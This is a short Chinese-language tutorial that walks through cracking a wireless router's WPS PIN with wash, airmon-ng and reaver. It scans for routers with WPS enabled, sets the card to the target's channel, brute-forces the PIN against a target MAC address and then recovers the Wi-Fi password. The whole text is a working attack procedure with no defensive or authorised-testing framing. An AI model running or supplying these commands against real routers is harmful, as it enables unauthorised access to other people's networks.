首先关闭网络服务
service network-manager stop
wps一般可在10-20小时可以爆破开,攻击难度较低,有一些厂家的无线路由甚至无法关闭WPS功能。
开始侦听开启wps功能的无线
wash -C -i <网卡>
也可以用airmon-ng wlan1mon --wps 扫描支持wps功能的路由器
查看网卡工作的信道 iwlist wlan0mon channel
修改成目标路由器的同一信道,修改信道之前先停掉 airmon-ng stop wlan0mon,开启时加上信道号,airmon-ng start wlan0 <信道号> , 再查看工作信道就会发现已更改。
开始爆破pin码,尝试11000次,每尝试10次就会等待一段时间,防止被路由器禁止
reaver -i <网卡> -b <目标路由器mac> -vv
如果pin码查询出来以后,就可以快速查询到无线路由器的密码
reaver -i wlan1mon -b <路由器mac> -vv -p <pin码> -c <信道>
把网络服务打开
service network-manager start